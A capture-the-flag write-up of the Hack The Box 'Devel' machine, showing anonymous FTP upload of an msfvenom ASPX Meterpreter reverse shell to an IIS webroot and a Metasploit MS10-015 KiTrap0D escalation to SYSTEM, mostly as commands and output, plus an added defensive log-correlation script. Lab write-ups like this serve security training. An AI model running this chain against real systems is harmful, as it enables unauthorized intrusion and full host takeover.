Ech0 - 10 / 11 / 19

Devel Writeup

Introduction:

Devel was an easy Windows box released back in March 2017.

Part 1: Initial Enumeration

As always, we begin our enumeration with Nmap to find the open ports.
We use the -sC flag for the default scripts and -sV for version detection.

  λ ech0 [~] → nmap -sC -sV 10.10.10.5
  Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 11:42 CET
  Nmap scan report for 10.10.10.5
  Host is up (0.039s latency).
  Not shown: 998 filtered ports
  PORT   STATE SERVICE VERSION
  21/tcp open  ftp     Microsoft ftpd
  | ftp-anon: Anonymous FTP login allowed (FTP code 230)
  | 03-18-17  01:06AM       <DIR>          aspnet_client
  | 03-17-17  04:37PM                  689 iisstart.htm
  |_03-17-17  04:37PM               184946 welcome.png
  | ftp-syst:
  |_  SYST: Windows_NT
  80/tcp open  http    Microsoft IIS httpd 7.5
  | http-methods:
  |_  Potentially risky methods: TRACE
  |_http-server-header: Microsoft-IIS/7.5
  |_http-title: IIS7
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds

We see that port 21 is open and exposes an FTP service that allows anonymous logins, and that port 80 serves Microsoft IIS 7.5.

Part 2: Getting User Access

The first step is to check whether we can download and upload files over FTP, since the service allows us to log in as an anonymous user.

  λ ech0 [~] → ftp 10.10.10.5
  Connected to 10.10.10.5.
  220 Microsoft FTP Service
  Name (10.10.10.5:ech0): anonymous
  331 Anonymous access allowed, send identity (e-mail name) as password.
  Password:
  230 User logged in.
  Remote system type is Windows_NT.

  ftp> dir
  200 PORT command successful.
  125 Data connection already open; Transfer starting.
  03-18-17  01:06AM       <DIR>          aspnet_client
  03-17-17  04:37PM                  689 iisstart.htm
  03-17-17  04:37PM               184946 welcome.png
  226 Transfer complete.

Now let's see whether we can download and upload files.

  ftp> dir
  200 PORT command successful.
  125 Data connection already open; Transfer starting.
  03-18-17  01:06AM       <DIR>          aspnet_client
  03-17-17  04:37PM                  689 iisstart.htm
  03-17-17  04:37PM               184946 welcome.png
  226 Transfer complete.

  ftp> get welcome.png
  200 PORT command successful.
  125 Data connection already open; Transfer starting.
  WARNING! 820 bare linefeeds received in ASCII mode
  File may not have transferred correctly.
  226 Transfer complete.
  184946 bytes received in 0.285 seconds (634 kbytes/s)

  ftp> put ech0.html
  200 PORT command successful.
  125 Data connection already open; Transfer starting.
  226 Transfer complete.
  16 bytes sent in 0.000144 seconds (109 kbytes/s)

We were able to download welcome.png and upload ech0.html; let's see if we can browse to our uploaded page.

As shown above, we successfully uploaded our webpage and browsed to it, which confirms that the anonymous FTP root is the IIS webroot. Now let's try uploading a reverse shell and browsing to it.

To generate the payload, named ech0.aspx, we use msfvenom with the -p (payload), LHOST, LPORT and -f (output format) flags.
In the same terminal we then start msfconsole with the matching handler module to receive the Meterpreter connection.

Terminal n°1:

  λ ech0 [~/_HTB/Devel] → msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=9001 -f aspx > ech0.aspx
  [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  [-] No arch selected, selecting arch: x86 from the payload
  No encoder or badchars specified, outputting raw payload
  Payload size: 341 bytes
  Final size of aspx file: 2824 bytes

  λ ech0 [~/_HTB/Devel] → msfconsole

  msf5 > use exploit/multi/handler

  msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp

  msf5 exploit(multi/handler) > set LHOST 10.10.14.48
  LHOST => 10.10.14.48

  msf5 exploit(multi/handler) > set LPORT 9001
  LPORT => 9001

  msf5 exploit(multi/handler) > show options

  Module options (exploit/multi/handler):

     Name  Current Setting  Required  Description
     ----  ---------------  --------  -----------


  Payload options (windows/meterpreter/reverse_tcp):

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
     LHOST     10.10.14.48      yes       The listen address (an interface may be specified)
     LPORT     9001             yes       The listen port


  Exploit target:

     Id  Name
     --  ----
     0   Wildcard Target

Our first terminal is ready to receive the connection. Now we upload the ech0.aspx payload from a second terminal, browse to it, and see whether we get our Meterpreter shell.

Terminal n°2:

  λ ech0 [~/_HTB/Devel] → ftp 10.10.10.5

  Connected to 10.10.10.5.
  220 Microsoft FTP Service
  Name (10.10.10.5:ech0): anonymous
  331 Anonymous access allowed, send identity (e-mail name) as password.
  Password:
  230 User logged in.
  Remote system type is Windows_NT.

  ftp> put ech0.aspx
  200 PORT command successful.
  125 Data connection already open; Transfer starting.
  226 Transfer complete.
  2860 bytes sent in 0.000315 seconds (8.66 Mbytes/s)
  ftp>

Terminal n°1:

  msf5 exploit(multi/handler) > exploit

  [*] Started reverse TCP handler on 10.10.14.48:9001
  [*] Sending stage (180291 bytes) to 10.10.10.5
  [*] Meterpreter session 1 opened (10.10.14.48:9001 -> 10.10.10.5:49158) at 2019-11-10 13:55:18 +0100

  meterpreter > getuid
  Server username: IIS APPPOOL\Web

  meterpreter > background
  [*] Backgrounding session 1...

We received our Meterpreter session, running as IIS APPPOOL\Web, a low-privileged application pool identity, so we now need to escalate privileges.
First we background the Meterpreter session so that we can use the MS10-015 local exploit, known as KiTrap0D.

  meterpreter > background
  [*] Backgrounding session 1...
  msf5 exploit(multi/handler) >

  msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d

  msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
  session => 1

  msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.48
  lhost => 10.10.14.48

  msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 9002
  lport => 9002

  msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

  [*] Started reverse TCP handler on 192.168.0.23:9002
  [*] Launching notepad to host the exploit...
  [+] Process 3372 launched.
  [*] Reflectively injecting the exploit DLL into 3372...
  [*] Injecting exploit into 3372 ...
  [*] Exploit injected. Injecting payload into 3372...
  [*] Payload injected. Executing exploit...
  [+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
  [*] Sending stage (179779 bytes) to 10.10.10.5
  [*] Meterpreter session 2 opened (10.10.14.48:9002 -> 10.10.10.5:49159) at 2019-11-10 14:04:56 -0500

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM

Our exploit worked! It returned a shell running as NT AUTHORITY\SYSTEM.
Now all that is left to do is grab the user and root flags.
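From the defender's side, the chain above (an anonymous FTP STOR of a server-side script into the webroot, followed by an HTTP request that makes IIS execute it) is easy to correlate across the FTP and web server logs. The following detection script is an added example, not part of the original writeup; the log layout is a simplified W3C-style format and every log line in it is constructed for this example.

```python
from datetime import datetime

# Server-side script extensions that IIS would execute if a browser requests them.
SCRIPT_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx")

# Constructed sample log lines (not from the original writeup), in a simplified
# W3C-style layout: date time c-ip cs-username cs-method cs-uri-stem sc-status
FTP_LOG = """\
2019-11-10 12:55:01 10.10.14.48 anonymous USER anonymous 331
2019-11-10 12:55:01 10.10.14.48 anonymous PASS *** 230
2019-11-10 12:55:04 10.10.14.48 anonymous RETR /welcome.png 226
2019-11-10 12:55:09 10.10.14.48 anonymous STOR /ech0.html 226
2019-11-10 12:55:20 10.10.14.48 anonymous STOR /ech0.aspx 226
"""
HTTP_LOG = """\
2019-11-10 12:55:12 10.10.14.48 - GET /ech0.html 200
2019-11-10 12:55:25 10.10.14.48 - GET /ech0.aspx 200
2019-11-10 12:56:00 10.10.14.50 - GET /iisstart.htm 200
"""

def parse_w3c(text):
    """Yield (timestamp, client_ip, user, method, uri, status) for each log line."""
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        date, time, ip, user, method, uri, status = line.split()
        yield datetime.fromisoformat(f"{date} {time}"), ip, user, method, uri, int(status)

def find_upload_then_execute(ftp_log, http_log):
    """Flag server-side scripts written via FTP that were later requested over HTTP.

    A successful STOR (2xx) of a file with a script extension is recorded; any
    later HTTP request for the same path produces one alert. Static files such as
    ech0.html are ignored, since IIS serves them without executing anything.
    """
    uploads = {}
    for ts, ip, user, method, uri, status in parse_w3c(ftp_log):
        if method == "STOR" and 200 <= status < 300 and uri.lower().endswith(SCRIPT_EXTENSIONS):
            uploads[uri.lower()] = (ts, ip, user)
    alerts = []
    for ts, ip, _user, method, uri, status in parse_w3c(http_log):
        uploaded = uploads.get(uri.lower())
        if uploaded and ts >= uploaded[0]:
            alerts.append({"uri": uri, "ftp_user": uploaded[2], "uploaded_by": uploaded[1],
                           "uploaded_at": uploaded[0], "requested_by": ip,
                           "requested_at": ts, "http_status": status})
    return alerts

if __name__ == "__main__":
    for a in find_upload_then_execute(FTP_LOG, HTTP_LOG):
        print(f"ALERT: {a['uri']} stored via FTP by {a['ftp_user']}@{a['uploaded_by']} at "
              f"{a['uploaded_at']}, then requested over HTTP from {a['requested_by']} at {a['requested_at']}")
```

On the sample data only /ech0.aspx is reported; the uploaded ech0.html is fetched too but is not a script, so it produces no alert.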

Part 3: The Root Access

The user flag is located in C:\Users\babis\Desktop.
The root flag is located in C:\Users\Administrator\Desktop.

  c:\Users\babis\Desktop>type user.txt
  type user.txt
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

  c:\Users\Administrator\Desktop>type root.txt
  type root.txt
  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

And that's it! We grabbed both the user and root flags.

Conclusion

Here we can see the progress graph: